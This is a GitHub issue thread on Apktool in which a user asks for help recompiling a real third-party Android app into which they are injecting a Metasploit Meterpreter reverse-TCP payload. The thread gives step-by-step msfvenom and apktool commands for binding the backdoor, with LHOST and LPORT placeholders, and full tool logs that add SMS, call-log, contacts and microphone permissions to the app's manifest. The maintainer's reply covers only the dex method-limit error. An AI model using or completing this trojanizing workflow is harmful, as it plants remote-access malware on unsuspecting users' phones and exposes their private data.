### ISSUE TITLE
[BUG] Apktool recompile error

### ISSUE THREAD

**Issue by TheBigBossYoyo** [iBotPeaches/Apktool#3138]
### Information
1. **Apktool Version (`apktool -version`)** -2.7.0
2. **Operating System (Mac, Linux, Windows)** -Linux
3. **APK From? (Playstore, ROM, Other)** -Apkcombo I think
4. **Java Version (`java --version`)** -java --version   
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
openjdk 17.0.6 2023-01-17
OpenJDK Runtime Environment (build 17.0.6+10-Debian-1)
OpenJDK 64-Bit Server VM (build 17.0.6+10-Debian-1, mixed mode, sharing

### Stacktrace/Logcat
That's with msfvenom :
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
[*] Creating signing key and keystore..
[*] Decompiling original APK..
[*] Decompiling payload APK..
[*] Locating hook point..
[*] Adding payload as package com.nautalapp.pwwcm
[*] Loading /tmp/d20230714-9980-uohfad/original/smali/com/nautalapp/MainApplication.smali and injecting payload..
[*] Poisoning the manifest with meterpreter permissions..
[*] Adding <uses-permission android:name="android.permission.ACCESS_WIFI_STATE"/>
[*] Adding <uses-permission android:name="android.permission.CALL_PHONE"/>
[*] Adding <uses-permission android:name="android.permission.CHANGE_WIFI_STATE"/>
[*] Adding <uses-permission android:name="android.permission.RECEIVE_SMS"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_CONTACTS"/>
[*] Adding <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_SETTINGS"/>
[*] Adding <uses-permission android:name="android.permission.READ_SMS"/>
[*] Adding <uses-permission android:name="android.permission.REQUEST_IGNORE_BATTERY_OPTIMIZATIONS"/>
[*] Adding <uses-permission android:name="android.permission.SET_WALLPAPER"/>
[*] Adding <uses-permission android:name="android.permission.READ_CONTACTS"/>
[*] Adding <uses-permission android:name="android.permission.RECORD_AUDIO"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_CALL_LOG"/>
[*] Adding <uses-permission android:name="android.permission.READ_CALL_LOG"/>
[*] Adding <uses-permission android:name="android.permission.SEND_SMS"/>
[*] Rebuilding apk with meterpreter injection as /tmp/d20230714-9980-uohfad/output.apk
[-] I: Using Apktool 2.7.0-dirty
I: Checking whether sources has changed...
I: Smaling smali folder into classes.dex...
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Exception in thread "main" org.jf.util.ExceptionWithContext: Exception occurred while writing code_item for method Landroidx/collection/LongSparseArray;->clone()Landroidx/collection/LongSparseArray;
        at org.jf.dexlib2.writer.DexWriter.writeDebugAndCodeItems(DexWriter.java:1058)
        at org.jf.dexlib2.writer.DexWriter.writeTo(DexWriter.java:354)
        at org.jf.dexlib2.writer.DexWriter.writeTo(DexWriter.java:309)
        at brut.androlib.src.SmaliBuilder.build(SmaliBuilder.java:58)
        at brut.androlib.src.SmaliBuilder.build(SmaliBuilder.java:37)
        at brut.androlib.Androlib.buildSourcesSmali(Androlib.java:437)
        at brut.androlib.Androlib.buildSources(Androlib.java:368)
        at brut.androlib.Androlib.build(Androlib.java:320)
        at brut.androlib.Androlib.build(Androlib.java:287)
        at brut.apktool.Main.cmdBuild(Main.java:263)
        at brut.apktool.Main.main(Main.java:82)
Caused by: org.jf.util.ExceptionWithContext: Error while writing instruction at code offset 0x12
        at org.jf.dexlib2.writer.DexWriter.writeCodeItem(DexWriter.java:1331)
        at org.jf.dexlib2.writer.DexWriter.writeDebugAndCodeItems(DexWriter.java:1054)
        ... 10 more
Caused by: org.jf.util.ExceptionWithContext: Unsigned short value out of range: 65540
        at org.jf.dexlib2.writer.DexDataWriter.writeUshort(DexDataWriter.java:116)
        at org.jf.dexlib2.writer.InstructionWriter.write(InstructionWriter.java:356)
        at org.jf.dexlib2.writer.DexWriter.writeCodeItem(DexWriter.java:1291)
        ... 11 more

Error: apktool execution failed

Include stacktrace here
```

### Steps to Reproduce
Option 1 :
1. msfvenom -x Nautal.apk -p android/meterpreter/reverse_tcp LHOST=YOURIP LPORT=4444 -o Nautal.apk
Option 2 :
1. sudo ./apkbinder.sh
2. Apk name : pathtotheapk
3. Output name : Nautal.apk
4. LHOST : yourip
5. LPORT : 4444
Option 3 :
1. apktool d Nautal.apk
2. msfvenom -p android/meterpreter/reverse_tcp LHOST=YOURIP LPORT=4444 -o payload.apk
3. apktool d payload.apk
4. Merge the two (here is a website for tuto : https://null-byte.wonderhowto.com/how-to/embed-metasploit-payload-original-apk-file-part-2-do-manually-0167124/)
5. apktool b Nautal

### Frameworks
If this APK is from an OEM ROM (Samsung, HTC, LG). Please attach framework files
(`.apks` that live in `/system/framework` or `/system/priv-app`)

### APK
If this APK can be freely shared, please upload/attach a link to it.
Here is the apk file :
https://apkpure.com/nautal-owners/com.nautalapp/download
### Questions to ask before submission
1. Have you tried `apktool d`, `apktool b` without changing anything? Yes
7. If you are trying to install a modified apk, did you resign it? Yes
8. Are you using the latest apktool version?Yes

**Comment by TheBigBossYoyo** [comment]
Sorry I've been wrong here is the real error with  the latest version :
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
[*] Creating signing key and keystore..
[*] Decompiling original APK..
[*] Decompiling payload APK..
[*] Locating hook point..
[*] Adding payload as package com.nautalapp.pwwcm
[*] Loading /tmp/d20230714-9980-uohfad/original/smali/com/nautalapp/MainApplication.smali and injecting payload..
[*] Poisoning the manifest with meterpreter permissions..
[*] Adding <uses-permission android:name="android.permission.ACCESS_WIFI_STATE"/>
[*] Adding <uses-permission android:name="android.permission.CALL_PHONE"/>
[*] Adding <uses-permission android:name="android.permission.CHANGE_WIFI_STATE"/>
[*] Adding <uses-permission android:name="android.permission.RECEIVE_SMS"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_CONTACTS"/>
[*] Adding <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_SETTINGS"/>
[*] Adding <uses-permission android:name="android.permission.READ_SMS"/>
[*] Adding <uses-permission android:name="android.permission.REQUEST_IGNORE_BATTERY_OPTIMIZATIONS"/>
[*] Adding <uses-permission android:name="android.permission.SET_WALLPAPER"/>
[*] Adding <uses-permission android:name="android.permission.READ_CONTACTS"/>
[*] Adding <uses-permission android:name="android.permission.RECORD_AUDIO"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_CALL_LOG"/>
[*] Adding <uses-permission android:name="android.permission.READ_CALL_LOG"/>
[*] Adding <uses-permission android:name="android.permission.SEND_SMS"/>
[*] Rebuilding apk with meterpreter injection as /tmp/d20230714-9980-uohfad/output.apk
[-] I: Using Apktool 2.7.0
I: Checking whether sources has changed...
I: Smaling smali folder into classes.dex...
Exception in thread "main" org.jf.util.ExceptionWithContext: Exception occurred while writing code_item for method Landroidx/collection/LongSparseArray;->clone()Landroidx/collection/LongSparseArray;
        at org.jf.dexlib2.writer.DexWriter.writeDebugAndCodeItems(DexWriter.java:1058)
        at org.jf.dexlib2.writer.DexWriter.writeTo(DexWriter.java:354)
        at org.jf.dexlib2.writer.DexWriter.writeTo(DexWriter.java:309)
        at brut.androlib.src.SmaliBuilder.build(SmaliBuilder.java:58)
        at brut.androlib.src.SmaliBuilder.build(SmaliBuilder.java:37)
        at brut.androlib.Androlib.buildSourcesSmali(Androlib.java:437)
        at brut.androlib.Androlib.buildSources(Androlib.java:368)
        at brut.androlib.Androlib.build(Androlib.java:320)
        at brut.androlib.Androlib.build(Androlib.java:287)
        at brut.apktool.Main.cmdBuild(Main.java:263)
        at brut.apktool.Main.main(Main.java:82)
Caused by: org.jf.util.ExceptionWithContext: Error while writing instruction at code offset 0x12
        at org.jf.dexlib2.writer.DexWriter.writeCodeItem(DexWriter.java:1331)
        at org.jf.dexlib2.writer.DexWriter.writeDebugAndCodeItems(DexWriter.java:1054)
        ... 10 more
Caused by: org.jf.util.ExceptionWithContext: Unsigned short value out of range: 65540
        at org.jf.dexlib2.writer.DexDataWriter.writeUshort(DexDataWriter.java:116)
        at org.jf.dexlib2.writer.InstructionWriter.write(InstructionWriter.java:356)
        at org.jf.dexlib2.writer.DexWriter.writeCodeItem(DexWriter.java:1291)
        ... 11 more

Error: apktool execution failed

**Comment by iBotPeaches** [comment]
From this line:

```
 Caused by: org.jf.util.ExceptionWithContext: Unsigned short value out of range: 65540
 ```
 
You can tell you expanded the method count of a dex file past its limit (unsigned short max). This is common when you run a tool that modifies/edits applications. This application didn't have room to expand its method count.

There is nothing Apktool did wrong here or can fix.

**Comment by TheBigBossYoyo** [comment]
So how to fix it

**Comment by TheBigBossYoyo** [comment]
And you aswered really quickly thank you
